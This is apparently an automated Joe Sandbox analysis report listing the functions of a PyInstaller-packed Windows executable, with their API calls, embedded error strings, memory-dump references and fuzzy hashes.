                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                                                    • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                                    • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                                                    • Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                                                    • Instruction ID: 89aef188a2f90600393c46ac757ca7c5610f37631863ccb7d782ce4fd47d887d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E331DE22704B4182E720BF25B8141E6A6A6BF847E4F800136EF8DA3B55DF7CD556C734
                                                                                                                                                                                                                                                                    Function 00007FF7C266DD38 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF7C266DFEA,?,?,?,00007FF7C266DCDC,?,?,?,00007FF7C266D8D9), ref: 00007FF7C266DDBD
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF7C266DFEA,?,?,?,00007FF7C266DCDC,?,?,?,00007FF7C266D8D9), ref: 00007FF7C266DDCB
                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF7C266DFEA,?,?,?,00007FF7C266DCDC,?,?,?,00007FF7C266D8D9), ref: 00007FF7C266DDF5
                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF7C266DFEA,?,?,?,00007FF7C266DCDC,?,?,?,00007FF7C266D8D9), ref: 00007FF7C266DE63
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF7C266DFEA,?,?,?,00007FF7C266DCDC,?,?,?,00007FF7C266D8D9), ref: 00007FF7C266DE6F
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                                                                                                                    • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                                    • Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                                                    • Instruction ID: ca99eaaddc0146296dad49e4de504ee13e411f562468232d8270157770db3c05
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD31E125B0A64281EE12BF52E801574A3A5FF58BB0F990135DD9D67B80EFBCE044C3B8
                                                                                                                                                                                                                                                                    Function 00007FF7C2666350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                                                    • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                                                    • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                                                    • Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                                                                                    • Instruction ID: cead83cd1ccf990a599cd26594d67f04881fba9857dd11e7a31f7606ff52a15b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2416021A19A86D1EA25EF20E4142E9A322FB54364FC04132DADD63F99EFBCE515C374
                                                                                                                                                                                                                                                                    Function 00007FF7C2662A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7C266351A,?,00000000,00007FF7C2663F23), ref: 00007FF7C2662AA0
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                                                    • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                                    • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                                                    • Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                                                    • Instruction ID: 43adab08448be0236fbb7b3e05f7bc3f8078ad4ed0d86ee71749775be72ed707
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65219472619B8192E720AF51B8417E6A3A5BB88794F800136EECCA3B59DFBCD145C720
                                                                                                                                                                                                                                                                    Function 00007FF7C267B1C0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                    • Opcode ID: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
                                                                                                                                                                                                                                                                    • Instruction ID: 7faab1d344f064db26c71e0adac65fa2a5a9de31009b06518c82681ad8f7ca4f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73214820A0E24681FA587B7166A113DD1435F54BB0FA44735E8BE66FD6DFACA840C730
                                                                                                                                                                                                                                                                    Function 00007FF7C2687DDC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                                    • String ID: CONOUT$
                                                                                                                                                                                                                                                                    • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                                    • Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                                                    • Instruction ID: fe52ff5bb5477cff0e6adb46630e17b51b97d991c8b06975d0aa1f08d58d2520
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE117221618A41C6E750AF52A854339F2A1BB88FF4F540234D99D97BA4DFBCD804C760
                                                                                                                                                                                                                                                                    Function 00007FF7C2668560 Relevance: 9.1, APIs: 6, Instructions: 127COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF7C2669216), ref: 00007FF7C2668592
                                                                                                                                                                                                                                                                    • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF7C2669216), ref: 00007FF7C26685E9
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2669400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7C26645E4,00000000,00007FF7C2661985), ref: 00007FF7C2669439
                                                                                                                                                                                                                                                                    • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF7C2669216), ref: 00007FF7C2668678
                                                                                                                                                                                                                                                                    • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF7C2669216), ref: 00007FF7C26686E4
                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,00000000,00007FF7C2669216), ref: 00007FF7C26686F5
                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,00000000,00007FF7C2669216), ref: 00007FF7C266870A
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3462794448-0
                                                                                                                                                                                                                                                                    • Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                                                                                                                                                                                    • Instruction ID: f42f330bcf78f77c00130167690d867ba23e71ba7eb3f7b2cd23e656e472fa11
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A419862B1968241E630AF21A5446AAA3B6FF84BE4F840135DFCDA7F85DE7CD405C734
                                                                                                                                                                                                                                                                    Function 00007FF7C267B338 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF7C2674F81,?,?,?,?,00007FF7C267A4FA,?,?,?,?,00007FF7C26771FF), ref: 00007FF7C267B347
                                                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7C2674F81,?,?,?,?,00007FF7C267A4FA,?,?,?,?,00007FF7C26771FF), ref: 00007FF7C267B37D
                                                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7C2674F81,?,?,?,?,00007FF7C267A4FA,?,?,?,?,00007FF7C26771FF), ref: 00007FF7C267B3AA
                                                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7C2674F81,?,?,?,?,00007FF7C267A4FA,?,?,?,?,00007FF7C26771FF), ref: 00007FF7C267B3BB
                                                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7C2674F81,?,?,?,?,00007FF7C267A4FA,?,?,?,?,00007FF7C26771FF), ref: 00007FF7C267B3CC
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(?,?,?,00007FF7C2674F81,?,?,?,?,00007FF7C267A4FA,?,?,?,?,00007FF7C26771FF), ref: 00007FF7C267B3E7
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                    • Opcode ID: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
                                                                                                                                                                                                                                                                    • Instruction ID: 4f8fd3e3ad480a515c0257d243a3328341196199c08efc76b14b57b4b4aba63b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD113B24A0C68282FA587F31769113DE1435F54BB0FA44735E8AEA6FD6DFACA481C731
                                                                                                                                                                                                                                                                    Function 00007FF7C2662910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7C2661B6A), ref: 00007FF7C266295E
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                                                    • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                                    • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                                                    • Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                                                    • Instruction ID: 03670c0cdb37342e05691df6835660fe32a63f5242df00d64ed4de1105fd1c94
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D231ED22B15A8192E710BB65B8405E6A296BF847E4F800131EECD93B55EFBCD546C730
                                                                                                                                                                                                                                                                    Function 00007FF7C2662390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                                    • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                                    • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                                    • Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                                                                                                                                                                                    • Instruction ID: a64310fd92ac64e056d7ba75fc38410cde472148f533d8b158710979c8469994
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8315D62609A8289EB20BF21E8552F9A361FF887A8F840135EA8D57F59DF7CD104C720
                                                                                                                                                                                                                                                                    Function 00007FF7C2662B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7C266918F,?,00007FF7C2663C55), ref: 00007FF7C2662BA0
                                                                                                                                                                                                                                                                    • MessageBoxW.USER32 ref: 00007FF7C2662C2A
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                                                    • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                                                    • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                                                    • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                                                    • Instruction ID: 4790b0b2b294c19c476ec75688266e3f9a391377e1abfc216dc38fc722bf17bc
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C219462708B8192E710AF24B8447EAA365EB88794F804136EE8DA7B55DF7CD615C720
                                                                                                                                                                                                                                                                    Function 00007FF7C2662710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7C2661B99), ref: 00007FF7C2662760
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                                                    • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                                    • API String ID: 2050909247-1591803126
